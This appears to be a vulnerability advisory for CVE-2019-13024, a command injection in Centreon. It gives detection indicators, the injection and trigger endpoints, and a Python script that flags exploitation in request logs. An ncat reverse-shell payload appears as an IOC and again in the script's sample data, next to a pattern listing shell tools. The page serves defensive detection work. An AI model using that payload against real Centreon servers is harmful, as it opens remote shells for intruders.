CVE-2019-13024
published 2019-07-01

Priority: P2 · 74 · high
CVSS 3.0: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS: 32.16% (98.1th percentile)
Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29 allow an attacker to execute arbitrary system commands by using the value "init_script"-"Monitoring Engine Binary" in main.get.php to insert an arbitrary command into the database, and then executing it by calling the vulnerable page www/include/configuration/configGenerate/xml/generateFiles.php, which passes the inserted value from the database to shell_exec without sanitizing it, allowing execution of arbitrary system commands.

Affected

1 ranges
Vendor | Product | Version range | Fixed in
centreon | centreon | |

Detection & IOCs (extracted from sources)

url: /centreon/api/index.php?action=authenticate
path: /main.get.php?p=60901
path: /include/configuration/configGenerate/xml/generateFiles.php
command: ncat -e /bin/bash {ip} {port} #
  • Monitor POST requests to /include/configuration/configGenerate/xml/generateFiles.php with parameters poller, debug, and generate — this is the trigger endpoint that causes shell_exec of the injected command.
  • Detect POST requests to /main.get.php?p=60901 (Poller configuration page) where the nagios_bin field contains shell metacharacters or unexpected binaries (e.g., ncat, bash, nc) — this is the injection point for the malicious command.
  • Alert on the init_script / Monitoring Engine Binary field (nagios_bin) in Centreon poller configuration containing shell operators or network tools — the value is stored in the database and later executed via shell_exec.
  • Detect POST requests to /centreon/api/index.php?action=authenticate with high frequency from a single source IP — this endpoint is targeted by the brute-force stage that precedes RCE exploitation.
  • Look for the POST body parameter combination of poller=1&debug=true&generate=true to /generateFiles.php as a reliable indicator of exploitation attempt.
  • Exploitation requires prior authentication to Centreon; attackers must obtain valid credentials (e.g., via brute force against the API) before injecting the payload.
  • The injected nagios_bin payload uses a trailing '#' comment character to suppress the remainder of the legitimate command string; detection rules should account for this obfuscation pattern.
  • Affected versions span Centreon 18.x before 18.10.6, 19.x before 19.04.3, and Centreon web before 2.8.29; detections should be scoped to these versions.
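
The request patterns listed above, applied to parsed request records, as an added example (not code from the original page or from Centreon). It assumes records that carry source IP, method, URL and the captured POST body, for instance from a WAF or reverse proxy; the record field names, the threshold and the sample records are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, urlencode

# Shell operators and network tools named in the bullets above; tune for your estate.
SUSPICIOUS = re.compile(r"[;&|`$#<>]|\b(?:ncat|nc|bash)\b")
AUTH_THRESHOLD = 5  # assumed per-source limit within the analysed window
TRIGGER_PATH = "/include/configuration/configGenerate/xml/generateFiles.php"

def classify(rec):
    """Return finding labels for one request record (dict with method, url, body)."""
    if rec["method"] != "POST":
        return []
    url = urlsplit(rec["url"])
    query, body = parse_qs(url.query), parse_qs(rec.get("body", ""))
    findings = []
    # Injection point: poller configuration page with a suspicious nagios_bin value.
    if url.path.endswith("/main.get.php") and query.get("p") == ["60901"]:
        if any(SUSPICIOUS.search(v) for v in body.get("nagios_bin", [])):
            findings.append("nagios_bin-injection")
    # Trigger endpoint: poller, debug and generate all present in the body.
    if url.path.endswith(TRIGGER_PATH) and {"poller", "debug", "generate"}.issubset(body):
        findings.append("generateFiles-trigger")
    return findings

def scan(records):
    """Classify every record, then flag sources hammering the authenticate endpoint."""
    hits = [(r["src"], f) for r in records for f in classify(r)]
    auth = Counter(
        r["src"] for r in records
        if r["method"] == "POST"
        and urlsplit(r["url"]).path.endswith("/api/index.php")
        and parse_qs(urlsplit(r["url"]).query).get("action") == ["authenticate"]
    )
    hits += [(ip, "auth-bruteforce") for ip, n in auth.items() if n >= AUTH_THRESHOLD]
    return hits

# Constructed sample records (not real traffic); both IPs are documentation addresses.
SAMPLE = [{"src": "192.0.2.7", "method": "POST",
           "url": "/centreon/api/index.php?action=authenticate"}] * 6 + [
    {"src": "192.0.2.7", "method": "POST", "url": "/centreon/main.get.php?p=60901",
     "body": urlencode({"nagios_bin": "ncat -e /bin/bash {ip} {port} #"})},
    {"src": "192.0.2.7", "method": "POST", "url": "/centreon" + TRIGGER_PATH,
     "body": "poller=1&debug=true&generate=true"},
    {"src": "198.51.100.3", "method": "POST", "url": "/centreon/main.get.php?p=60901",
     "body": urlencode({"nagios_bin": "/usr/sbin/centengine"})},
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE):
        print(ip, finding)
```

Plain web server access logs usually omit POST bodies, so the nagios_bin and trigger checks need a log source that records them.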

CVSS provenance

nvd | v3.0 | 8.8 | HIGH | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C